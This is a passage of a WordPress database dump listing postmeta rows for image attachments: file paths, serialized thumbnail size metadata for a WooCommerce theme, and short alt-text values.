_wp_attached_file','2018/02/pricing-img-4.jpg'),(1134,3295,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:523;s:6:\"height\";i:504;s:4:\"file\";s:25:\"2018/02/pricing-img-4.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"pricing-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-300x289.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-523x300.jpg\";s:5:\"width\";i:523;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"pricing-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"pricing-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1135,941,'_wp_attached_file','2018/01/h8-slide1-background.jpg'),(1136,941,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1105;s:6:\"height\";i:737;s:4:\"file\";s:32:\"2018/01/h8-slide1-background.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h8-slide1-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"h8-slide1-background-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"h8-slide1-background-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-550x737.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h8-slide1-background-1100x737.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h8-slide1-background-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h8-slide1-background-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1137,3295,'_wp_attachment_image_alt','a'),(1138,3309,'_wp_attached_file','2018/02/h4-slide1-graphic7.png'),(1139,3309,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1637;s:6:\"height\";i:1066;s:4:\"file\";s:30:\"2018/02/h4-slide1-graphic7.png\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic7-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-600x391.png\";s:5:\"width\";i:600;s:6:\"height\";i:391;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-300x195.png\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"h4-slide1-graphic7-1024x667.png\";s:5:\"width\";i:1024;s:6:\"height\";i:667;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-768x500.png\";s:5:\"width\";i:768;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1536x1000.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1000;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"h4-slide1-graphic7-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h4-slide1-graphic7-550x1066.png\";s:5:\"width\";i:550;s:6:\"height\";i:1066;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1100x1066.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1066;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic7-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-600x391.png\";s:5:\"width\";i:600;s:6:\"height\";i:391;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1140,3279,'_wp_attachment_image_alt',''),(1141,3280,'_wp_attachment_image_alt','o'),(1142,3295,'_wp_attachment_image_alt','a'),(1143,1567,'_wp_attachment_image_alt','a'),(1144,3310,'_wp_attached_file','2018/02/h4-slide1-graphic7-1.png'),(1145,3310,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1637;s:6:\"height\";i:1066;s:4:\"file\";s:32:\"2018/02/h4-slide1-graphic7-1.png\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-600x391.png\";s:5:\"width\";i:600;s:6:\"height\";i:391;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-300x195.png\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"h4-slide1-graphic7-1-1024x667.png\";s:5:\"width\";i:1024;s:6:\"height\";i:667;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-768x500.png\";s:5:\"width\";i:768;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic7-1-1536x1000.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1000;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"h4-slide1-graphic7-1-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"h4-slide1-graphic7-1-550x1066.png\";s:5:\"width\";i:550;s:6:\"height\";i:1066;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:34:\"h4-slide1-graphic7-1-1100x1066.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1066;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-600x391.png\";s:5:\"width\";i:600;s:6:\"height\";i:391;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic7-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1146,1572,'_wp_attached_file','2018/01/h7-img-15.jpg'),(1147,1572,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:21:\"2018/01/h7-img-15.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-15-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h7-img-15-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-15-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h7-img-15-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h7-img-15-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1148,4249,'_wp_attachment_image_alt',''),(1149,3280,'_wp_attachment_image_alt','o'),(1150,3295,'_wp_attachment_image_alt','a'),(1151,3310,'_wp_attachment_image_alt','o'),(1152,3556,'_wp_attachment_image_alt',''),(1153,3311,'_wp_attached_file','2018/02/h4-slide1-graphic6.png'),(1154,3311,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1629;s:6:\"height\";i:1105;s:4:\"file\";s:30:\"2018/02/h4-slide1-graphic6.png\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic6-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-600x407.png\";s:5:\"width\";i:600;s:6:\"height\";i:407;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-300x203.png\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"h4-slide1-graphic6-1024x695.png\";s:5:\"width\";i:1024;s:6:\"height\";i:695;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-768x521.png\";s:5:\"width\";i:768;s:6:\"height\";i:521;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic6-1536x1042.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1042;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"h4-slide1-graphic6-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h4-slide1-graphic6-550x1100.png\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"h4-slide1-graphic6-1100x1100.png\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic6-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-600x407.png\";s:5:\"width\";i:600;s:6:\"height\";i:407;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic6-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1155,4248,'_wp_attachment_image_alt','o'),(1156,3562,'_wp_attached_file','2018/02/landing-slide2-graphic1.png'),(1157,3562,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:709;s:6:\"height\";i:830;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-600x702.png\";s:5:\"width\";i:600;s:6:\"height\";i:702;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-256x300.png\";s:5:\"width\";i:256;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-709x550.png\";s:5:\"width\";i:709;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-550x830.png\";s:5:\"width\";i:550;s:6:\"height\";i:830;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-600x702.png\";s:5:\"width\";i:600;s:6:\"height\";i:702;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1158,1572,'_wp_attachment_image_alt','a'),(1159,2239,'_wp_attached_file','2018/02/h8-novo.png'),(1160,2239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1339;s:6:\"height\";i:458;s:4:\"file\";s:19:\"2018/02/h8-novo.png\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h8-novo-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h8-novo-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"h8-novo-600x205.png\";s:5:\"width\";i:600;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h8-novo-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"h8-novo-1024x350.png\";s:5:\"width\";i:1024;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h8-novo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"h8-novo-768x263.png\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"h8-novo-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h8-novo-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"h8-novo-550x458.png\";s:5:\"width\";i:550;s:6:\"height\";i:458;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h8-novo-1100x458.png\";s:5:\"width\";i:1100;s:6:\"height\";i:458;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:19:\"h8-novo-550x458.png\";s:5:\"width\";i:550;s:6:\"height\";i:458;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:20:\"